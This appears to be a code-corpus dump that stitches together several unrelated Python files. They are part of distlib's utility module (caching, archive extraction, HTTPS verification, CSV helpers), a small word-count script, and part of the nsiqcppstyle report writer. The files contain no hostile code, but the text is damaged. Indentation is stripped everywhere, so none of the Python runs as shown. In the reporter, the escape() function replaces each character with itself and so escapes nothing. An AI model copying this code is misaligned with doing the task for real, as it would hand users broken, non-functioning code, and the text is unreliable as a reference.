directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(' ', '-')
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get('Content-Type')
if not ct.startswith('application/json'):
logger.debug('Unexpected response for JSON request: %s', ct)
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'
def get_project_data(name):
url = '%s/%s/project.json' % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else: # pragma: no cover
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
CertificateError)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs['encoding'] = 'utf-8'
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub('[-_.]+', '-', name).lower()
|
lastralab/Statistics | refs/heads/master | Specialization/Dr. Chuck-s Code/count1.py | 2 | fname = raw_input('Enter the file name: ')
try:
fhand = open(fname)
except:
print 'File cannot be opened:', fname
exit()
counts = dict()
for line in fhand:
words = line.split()
for word in words:
if word not in counts:
counts[word] = 1
else:
counts[word] += 1
print counts
|
jhbradley/moose | refs/heads/devel | framework/contrib/nsiqcppstyle/nsiqcppstyle_reporter.py | 43 | # Copyright (c) 2009 NHN Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of NHN Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import nsiqcppstyle_state
import nsiqcppstyle_checker
import nsiqcppstyle_rulemanager
import sys
import csv
import os
####################################################################################################
csvfile = None
writer = None
target = None
def PrepareReport(outputPath, format) :
"""
Set up sth like report headers
"""
global writer
if format == "csv" :
if os.path.isdir(outputPath) :
outputPath = os.path.join(outputPath, "nsiqcppstyle_report.csv")
csvfile = file(outputPath, "wb")
writer = csv.writer(csvfile)
writer.writerow(("File", "Line", "Column", "Message", "Rule", "Rule Url"))
elif format == "xml" :
if os.path.isdir(outputPath) :
outputPath = os.path.join(outputPath, "nsiqcppstyle_report.xml")
writer = file(outputPath, "wb")
writer.write("<?xml version='1.0'?>\n<checkstyle version='4.4'>\n")
elif format == "html" :
if os.path.isdir(outputPath) :
outputPath = os.path.join(outputPath, "nsiqcppstyle_report.html")
writer = file(outputPath, "wb")
writer.write("""<!DOCTYPE html><html><body><head></head><font size=2><ul id="main">\n""")
def ReportSummaryToScreen(analyzedFiles, nsiqcppstyle_state, filter, ciMode) :
"""
Report Summary Info into the screen.
"""
if _nsiqcppstyle_state.quiet == True:
if _nsiqcppstyle_state.output_format == 'html':
global writer
fileCount = len(analyzedFiles)
violatedFileCount = len(nsiqcppstyle_state.errorPerFile.keys())
buildQuality = 0
if fileCount != 0 :
buildQuality = (fileCount - violatedFileCount) * 100.0 / fileCount
writer.write("""<hr /><br>================================== Summary Report ===================================<br> ** Total Available Rules : %d<br> ** Total Applied Rules : %d<br> ** Total Violated Rules : %d<br> ** Total Errors Occurs : %d<br> ** Total Analyzed Files : %d<br> ** Total Violated Files Count: %d<br> ** Build Quality : %.2f%%<br>""" % (nsiqcppstyle_rulemanager.ruleManager.availRuleCount, len(nsiqcppstyle_state.checkers), len(nsiqcppstyle_state.errorPerChecker.keys()), nsiqcppstyle_state.error_count, len(analyzedFiles), violatedFileCount, buildQuality))
writer.write("""<br>================================== Applied Rules ===================================<br>\n""")
for checker in nsiqcppstyle_state.errorPerChecker.keys() :
writer.write(""" ** Rule violated: %s: %d times<br>\n""" % (checker, nsiqcppstyle_state.errorPerChecker[checker]))
print 'Syntax Comment Coverage: ' + str(buildQuality)[:4] + '%'
else:
fileCount = len(analyzedFiles)
violatedFileCount = len(nsiqcppstyle_state.errorPerFile.keys())
buildQuality = 0
if fileCount != 0 :
buildQuality = (fileCount - violatedFileCount) * 100.0 / fileCount
print "\n"
print ("=================================== Summary Report ===================================");
print (" ** Total Available Rules : %d" % nsiqcppstyle_rulemanager.ruleManager.availRuleCount)
print (" ** Total Applied Rules : %d" % len(nsiqcppstyle_state.checkers))
print (" ** Total Violated Rules : %d" % len(nsiqcppstyle_state.errorPerChecker.keys()))
print (" ** Total Errors Occurs : %d" % nsiqcppstyle_state.error_count)
print (" ** Total Analyzed Files : %d" % len(analyzedFiles))
print (" ** Total Violated Files Count: %d" % violatedFileCount)
print (" ** Build Quality : %.2f%%" % buildQuality)
if not ciMode :
print ("\n================================ Violated Rule Details ===============================")
for checker in nsiqcppstyle_state.errorPerChecker.keys() :
print " - ", checker, "rule violated :", nsiqcppstyle_state.errorPerChecker[checker]
print ("\n================================ Violated File Details ===============================")
for eachFile in nsiqcppstyle_state.errorPerFile.keys() :
count = 0
for eachRule in nsiqcppstyle_state.errorPerFile[eachFile].keys() :
count += nsiqcppstyle_state.errorPerFile[eachFile][eachRule]
print " - ", eachFile, " violated in total : ", count
for eachRule in nsiqcppstyle_state.errorPerFile[eachFile].keys() :
print " * ", eachRule, " : ", nsiqcppstyle_state.errorPerFile[eachFile][eachRule]
def CloseReport(format) :
if format == "xml" :
global writer
writer.write("</checkstyle>\n")
writer.close()
if format == "html" :
writer.write("</ul></font></body></html>\n")
writer.close()
####################################################################################################
#ruleMap = {}
def IsRuleUsed(ruleName, ruleNames) :
if ruleNames.count(ruleName) == 0 :
return "false"
else : return "true"
def ReportRules(availRuleName, ruleNames):
pass
#global ruleMap
#ruleMap = {}
#index = 0
#===========================================================================
# for eachAvailRuleName in availRuleName :
# ruleMap[eachAvailRuleName] = index
# index += 1
#
# if _nsiqcppstyle_state.output_format == 'xml':
# writer.write("<rules>\n")
# for eachAvailRuleName in availRuleName :
# url = "http://nsiqcppstyle.appspot.com/rule_doc/" + eachAvailRuleName
# writer.write("<rule name='%s' use='%s' index='%d' ruleDoc='%s'/>\n" % (eachAvailRuleName, IsRuleUsed(eachAvailRuleName, ruleNames), ruleMap[eachAvailRuleName], url ))
# writer.write("</rules>\n")
#===========================================================================
def StartDir(dirname):
if _nsiqcppstyle_state.output_format == 'xml':
pass
# writer.write("<dir name='%s'>\n" % (dirname))
def EndDir():
if _nsiqcppstyle_state.output_format == 'xml':
pass
# writer.write("</dir>\n")
def StartTarget(targetname):
""" Write Report when each target is analyzed"""
if _nsiqcppstyle_state.output_format == 'xml':
global target
target = targetname
# writer.write("<target name='%s'>\n" % (targetname))
def EndTarget():
""" Write Report when each target is ended"""
if _nsiqcppstyle_state.output_format == 'xml':
pass #writer.write("</target>\n")
def StartFile(dirname, filename):
if _nsiqcppstyle_state.output_format == 'xml':
writer.write("<file name='%s'>\n" % (os.path.join(target,dirname[1:], filename)))
def EndFile():
if _nsiqcppstyle_state.output_format == 'xml':
writer.write("</file>\n")
_nsiqcppstyle_state = nsiqcppstyle_state._nsiqcppstyle_state
def __dict_replace(s, d):
"""Replace substrings of a string using a dictionary."""
for key, value in d.items():
s = s.replace(key, value)
return s
def escape(data, entities={}):
"""Escape &, <, and > in a string of data.
You can escape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
# must do ampersand first
data = data.replace("&", "&")
data = data.replace(">", ">")
data = data.replace("<", "<")
if entities:
data = __dict_replace(data, entities)
return data
def ErrorInternal(t, ruleName, message):
"""
Print error
"""
global rule
ruleName = ruleName[6:]
if t == None :
return
